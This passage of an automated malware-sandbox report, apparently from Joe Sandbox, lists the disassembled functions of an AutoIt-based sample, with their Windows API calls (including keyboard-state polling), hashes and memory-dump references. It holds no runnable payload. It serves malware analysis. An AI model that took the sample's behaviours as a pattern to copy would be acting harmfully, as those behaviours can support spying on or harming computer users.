                                                                                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                                    Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                                    • DeleteObject.GDI32(00780045), ref: 00470A04
                                                                                                                    • DestroyIcon.USER32(00740069), ref: 00470A1C
                                                                                                                    • DeleteObject.GDI32(5088B673), ref: 00470A34
                                                                                                                    • DestroyWindow.USER32(0041005C), ref: 00470A4C
                                                                                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1237572874-0
                                                                                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                                    Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706829360-0
                                                                                                                    • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                                    • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                                    Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                                    Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3413494760-0
                                                                                                                    • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                                    • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                                    Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                                    • String ID: AU3_FreeVar
                                                                                                                    • API String ID: 2634073740-771828931
                                                                                                                    • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                                    • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                                                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                                    Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 2294789929-1287834457
                                                                                                                    • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                    • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                    Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 2483343779-2107944366
                                                                                                                    • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                    • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                                                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                    Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                    • _wcslen.LIBCMT ref: 00450720
                                                                                                                    • _wcscat.LIBCMT ref: 00450733
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                    • String ID: -----$SysListView32
                                                                                                                    • API String ID: 4008455318-3975388722
                                                                                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                                    Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                    • GetParent.USER32 ref: 00469C98
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                    • GetParent.USER32 ref: 00469CBC
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2360848162-1403004172
                                                                                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                                    Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 262282135-0
                                                                                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                                    Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                    • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                                    • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                                    • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                                    Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                    • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                                                    • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
